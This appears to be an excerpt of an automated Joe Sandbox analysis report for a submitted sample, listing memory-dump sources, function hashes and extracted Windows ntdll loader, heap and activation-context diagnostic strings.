                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                              • Opcode ID: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                                                                                              • Instruction ID: 39ba4bbf45e16e386c47d5a913cacb0be207af00f9f3897c9a16b70942305133
                                                                                                                                                              • Opcode Fuzzy Hash: 8ea7361f02addd29e466fb21943f212eb47d06df3d73392997433a74ff4f4177
                                                                                                                                                              • Instruction Fuzzy Hash: F7913470B003169BEF36DF18D944BAE7BA9BF91B25F500168E90CBB285D7B49843C791
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: VUUU$Z0}h$u$y$z:b~$-
                                                                                                                                                              • API String ID: 0-3284785209
                                                                                                                                                              • Opcode ID: d4ddfa6fa118a3f8a30ce4e81a0c38c68ffe46c7adcd93ba6a9ec083af88ae56
                                                                                                                                                              • Instruction ID: dad59245f53fe66d559b1dc9b9ccd27aa1d10540da2a404adf5aceff40e44855
                                                                                                                                                              • Opcode Fuzzy Hash: d4ddfa6fa118a3f8a30ce4e81a0c38c68ffe46c7adcd93ba6a9ec083af88ae56
                                                                                                                                                              • Instruction Fuzzy Hash: EB81B271D0062A97DF28CE99D8401AEF7B1EFA4310F54872AD959AF780E774AE548BC0
                                                                                                                                                              Strings
                                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01979A2A
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01979A11, 01979A3A
                                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01979A01
                                                                                                                                                              • LdrpInitShimEngine, xrefs: 019799F4, 01979A07, 01979A30
                                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019799ED
                                                                                                                                                              • apphelp.dll, xrefs: 01916496
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-204845295
                                                                                                                                                              • Opcode ID: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                                                                                              • Instruction ID: 73cfb89cca0dad7e0be358aae39222391d1547f827cfb4d3b07e31ebed31053e
                                                                                                                                                              • Opcode Fuzzy Hash: 5704d7c81f02614730e24668286f8ce27ff8cc6db836a1135fb6b94dc46802e7
                                                                                                                                                              • Instruction Fuzzy Hash: 8451CE716083099FE725EF24C881EAB77E8FFC4758F00091DE589972A4DA70E984CB92
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01998181, 019981F5
                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01998170
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0195C6C3
                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01998177, 019981EB
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 0195C6C4
                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 019981E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                              • Opcode ID: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                                                                                              • Instruction ID: 4b0ea49e231d2ac0249253796e71f977fc60fb051037c9785267ccda51ef8478
                                                                                                                                                              • Opcode Fuzzy Hash: 5ec35e4192d721516705cf6ed2dd50febd124e8e4a9aff2cd57b16d069ffc839
                                                                                                                                                              • Instruction Fuzzy Hash: A131F2B16443069FD724EF28DC46E2A7798FFD5B10F04055CF98DAB291E660ED05C7A2
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019921BF
                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01992160, 0199219A, 019921BA
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01992165
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01992178
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01992180
                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0199219F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                              • Opcode ID: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                                                                                              • Instruction ID: 4e4dfbd1684bcfbfd2f779d164df1a308044d61face4a9bda5167790122ca553
                                                                                                                                                              • Opcode Fuzzy Hash: ab05b0ec81f0b47774a6e9c689b91ab40d2e4733a2f8d749efc68a8a005f3cdd
                                                                                                                                                              • Instruction Fuzzy Hash: A731C876A41215BBEB22DBD98C85F6A7B7CEBA5A51F054059FF0C77140D370AA00C7A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                              • API String ID: 0-3393094623
                                                                                                                                                              • Opcode ID: 0721d4a266ebef90d807665f5574b9c76e72039cdbbe43d4b55407250e33d4f2
                                                                                                                                                              • Instruction ID: 2f46191aabc804291008937b81791a3817983a3a4044c7ea05049041517553ac
                                                                                                                                                              • Opcode Fuzzy Hash: 0721d4a266ebef90d807665f5574b9c76e72039cdbbe43d4b55407250e33d4f2
                                                                                                                                                              • Instruction Fuzzy Hash: 52025C719083418FD725DF68C084B6BBBE9BFC9748F54891EE99D87250D7B0D844CBA2
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 01962DF0: LdrInitializeThunk.NTDLL ref: 01962DFA
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BA3
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960BB6
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D60
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01960D74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404860816-0
                                                                                                                                                              • Opcode ID: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                                                                                              • Instruction ID: c7bf07c1fccbef7a43a73a65302aac0067a78d93559ea7956074b62a72e34581
                                                                                                                                                              • Opcode Fuzzy Hash: c78e7c5477a1d9b6e594e4b9e624661067a83a8e6d73a68620339844a4214d96
                                                                                                                                                              • Instruction Fuzzy Hash: AB423A75900715DFDB21CF68C880BAAB7F9FF44314F1445AAE98DAB241E770AA84CF61
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                              • API String ID: 0-2518169356
                                                                                                                                                              • Opcode ID: 932f4e0fa5ddc965e43b718ac527ba216fcbd3f051d5a845c613b0d891172d61
                                                                                                                                                              • Instruction ID: fac73c48e017d9d51a954e7dbe20793dd332db48ebdba9fd9f72b5895b39c2b6
                                                                                                                                                              • Opcode Fuzzy Hash: 932f4e0fa5ddc965e43b718ac527ba216fcbd3f051d5a845c613b0d891172d61
                                                                                                                                                              • Instruction Fuzzy Hash: CE91A276A006299BDB21CF5CC880ABEB7B8FF48310F9A4169E919E7350D775DA05CBD0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                              • Opcode ID: 38ac1d53e0597c69cd8b66c38bce5cb2226eedc0c88fa816add915307d639e09
                                                                                                                                                              • Instruction ID: 7f0a2f4f1088499278240fa2c6fbcbbf5d112a200ef09c41beb3583f441fa035
                                                                                                                                                              • Opcode Fuzzy Hash: 38ac1d53e0597c69cd8b66c38bce5cb2226eedc0c88fa816add915307d639e09
                                                                                                                                                              • Instruction Fuzzy Hash: E613D270A00256DFDB29CF68C484BA9BBF5FF89304F148699E94DAB381D734A945CF90
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01987D39
                                                                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01987D03
                                                                                                                                                              • SsHd, xrefs: 0193A885
                                                                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01987D56
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                              • API String ID: 0-2905229100
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 01958591
                                                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0195855E
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01958421
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 01958422
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1918872054
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: , xrefs: 019854E0, 019855A1
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 019854D1, 01985592
                                                                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019854ED
                                                                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019855AE
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                              • API String ID: 0-1657114761
                                                                                                                                                              Strings
                                                                                                                                                              • .Local, xrefs: 019528D8
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 019921DE
                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019921D9, 019922B1
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019922B6
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                              Strings
                                                                                                                                                              • RtlDeactivateActivationContext, xrefs: 01993425, 01993432, 01993451
                                                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01993437
                                                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0199342A
                                                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01993456
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                              • API String ID: 0-1245972979
                                                                                                                                                              Strings
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019810AE
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01981028
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01980FE5
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0198106B
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                              • API String ID: 0-1468400865
                                                                                                                                                              Strings
                                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0198A992
                                                                                                                                                              • LdrpDynamicShimModule, xrefs: 0198A998
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0198A9A2
                                                                                                                                                              • apphelp.dll, xrefs: 01942462
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-176724104
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: , xrefs: 01933264
                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0193327D
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01933255
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                              • API String ID: 0-617086771
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                                                                              • API String ID: 0-1670051934
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01921728
                                                                                                                                                              • HEAP: , xrefs: 01921596
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01921712
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $@
                                                                                                                                                              • API String ID: 0-1077428164
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0198A10F
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0198A121
                                                                                                                                                              • LdrpCheckModule, xrefs: 0198A117
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-161242083
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-1334570610
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019982E8
                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 019982DE
                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 019982D7
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                              Strings
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019DC1C5
                                                                                                                                                              • @, xrefs: 019DC1F1
                                                                                                                                                              • PreferredUILanguages, xrefs: 019DC212
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 019A4899
                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019A4888
                                                                                                                                                              • LdrpCheckRedirection, xrefs: 019A488F
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2558761708
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019A2104
                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 019A20F3
                                                                                                                                                              • LdrpInitializationFailure, xrefs: 019A20FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: #%u
                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@
                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                              Strings
                                                                                                                                                              • LdrResSearchResource Exit, xrefs: 0192AA25
                                                                                                                                                              • LdrResSearchResource Enter, xrefs: 0192AA13
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                              • API String ID: 0-4066393604
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @4Qw@4Qw$PATH
                                                                                                                                                              • API String ID: 0-1814558670
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: `$`
                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to retrieve service checksum., xrefs: 0197EE56
                                                                                                                                                              • ResIdCount less than 2., xrefs: 0197EEC9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                              • API String ID: 0-863616075
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$MUI
                                                                                                                                                              • API String ID: 0-17815947
                                                                                                                                                              Strings
                                                                                                                                                              • kLsE, xrefs: 01920540
                                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0192063D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
